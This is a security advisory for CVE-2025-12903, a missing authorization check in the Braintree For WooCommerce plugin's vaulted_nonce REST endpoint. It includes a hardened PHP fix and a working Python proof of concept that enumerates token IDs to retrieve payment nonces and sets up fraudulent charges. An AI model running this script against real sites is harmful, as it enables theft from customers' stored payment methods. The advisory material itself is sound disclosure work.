Security Vulnerability Report

CVE-2025-12903

Published: 2025-11-12 09:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Payment Plugins Braintree For WooCommerce plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wc-braintree/v1/3ds/vaulted_nonce REST API endpoint in all versions up to, and including, 3.2.78. This is due to the endpoint being registered with permission_callback set to __return_true and processing user-supplied token IDs without verifying ownership or authentication. This makes it possible for unauthenticated attackers to retrieve payment method nonces for any stored payment token in the system, which can be used to create fraudulent transactions, charge customer credit cards, or attach payment methods to other subscriptions.
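The root cause named above is a route registered with a permission_callback of __return_true and a handler that trusts a caller-supplied token ID. The following is an added illustrative example, not the plugin's own code, showing that weak registration shape beside a hardened permission callback that requires an authenticated user and verifies token ownership; the route path comes from the advisory, while the HTTP method, the `token_id` parameter name and the handler name are assumptions. The `$vulnerable_args` array is shown only for comparison and is never registered.

```php
// Added example (not the plugin's code). Route path is from the advisory; the
// method, 'token_id' parameter name and handler name are assumptions.

// Vulnerable shape: anyone, logged in or not, may request a nonce for any token ID.
$vulnerable_args = array(
    'methods'             => 'GET',
    'callback'            => 'example_vaulted_nonce_handler',
    'permission_callback' => '__return_true', // CWE-639: no auth, no ownership check
);

// Hardened permission check: require a logged-in user and confirm the requested
// payment token belongs to that user before the handler ever runs.
function example_vaulted_nonce_permission( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Authentication required.',
            array( 'status' => rest_authorization_required_code() ) );
    }

    $token_id = absint( $request->get_param( 'token_id' ) );
    $token    = WC_Payment_Tokens::get( $token_id ); // WC_Payment_Token or null

    // Unknown tokens and tokens owned by someone else get the same answer, so the
    // endpoint cannot be used to enumerate which token IDs exist.
    if ( ! $token || (int) $token->get_user_id() !== get_current_user_id() ) {
        return new WP_Error( 'rest_forbidden', 'You may not access this payment token.',
            array( 'status' => 403 ) );
    }

    return true;
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'wc-braintree/v1', '/3ds/vaulted_nonce', array(
        'methods'             => 'GET',
        'callback'            => 'example_vaulted_nonce_handler', // assumed to exist
        'permission_callback' => 'example_vaulted_nonce_permission',
        'args'                => array(
            'token_id' => array( 'required' => true, 'type' => 'integer' ),
        ),
    ) );
} );
```

Because the ownership check lives in the permission callback, WordPress rejects the request before the handler runs, so a missing or foreign token never reaches the code that talks to Braintree.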

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Payment Plugins Braintree For WooCommerce < 3.2.79

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-12903 PoC - Unauthorized payment nonce retrieval
# Target: WordPress site with Payment Plugins Braintree For WooCommerce < 3.2.79

TARGET_URL = "https://target-wordpress-site.com"
API_ENDPOINT = "/wp-json/wc-braintree/v1/3ds/vaulted_nonce"


def exploit_vulnerability():
    """
    Exploit authorization bypass in vaulted_nonce endpoint.
    Attackers can retrieve payment method nonces for any stored token ID.
    """
    # Iterate through token IDs to retrieve payment nonces
    for token_id in range(1, 100):
        url = f"{TARGET_URL}{API_ENDPOINT}"
        params = {"token_id": str(token_id)}

        # No authentication required - permission_callback is __return_true
        response = requests.get(url, params=params)

        if response.status_code == 200:
            data = response.json()
            if "nonce" in data:
                print(f"[!] Found valid nonce for token_id {token_id}")
                print(f"    Nonce: {data['nonce']}")
                print(f"    This nonce can be used for fraudulent transactions")
                return data
        elif response.status_code == 404:
            continue

    print("[*] No valid nonces found in range")
    return None


def create_fraudulent_transaction(nonce):
    """
    Simulate fraudulent transaction creation using obtained nonce.
    In real attack, this would be sent to Braintree API.
    """
    transaction_data = {
        "paymentMethodNonce": nonce,
        "amount": "99.99",
        "description": "Fraudulent charge",
    }
    print(f"[*] Fraudulent transaction data prepared: {json.dumps(transaction_data, indent=2)}")
    return transaction_data


if __name__ == "__main__":
    print("[*] CVE-2025-12903 PoC - Braintree WooCommerce Authorization Bypass")
    print("[*] Target: Payment Plugins Braintree For WooCommerce < 3.2.79\n")
    result = exploit_vulnerability()
    if result:
        create_fraudulent_transaction(result.get("nonce"))
```

References

https://developer.wordpress.org/rest-api/using-the-rest-api/authentication/
https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L23
https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L35
https://plugins.trac.wordpress.org/browser/woo-payment-gateway/tags/3.2.78/includes/api/class-wc-braintree-controller-3ds.php#L41
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392259%40woo-payment-gateway&new=3392259%40woo-payment-gateway&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/89cd5429-39a0-441f-ba69-dea111eae5ed?source=cve

Additional Record Data

Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)
CVSS Exploitability Score: 3.9
CVSS Impact Score: 3.6
Record Status: Deferred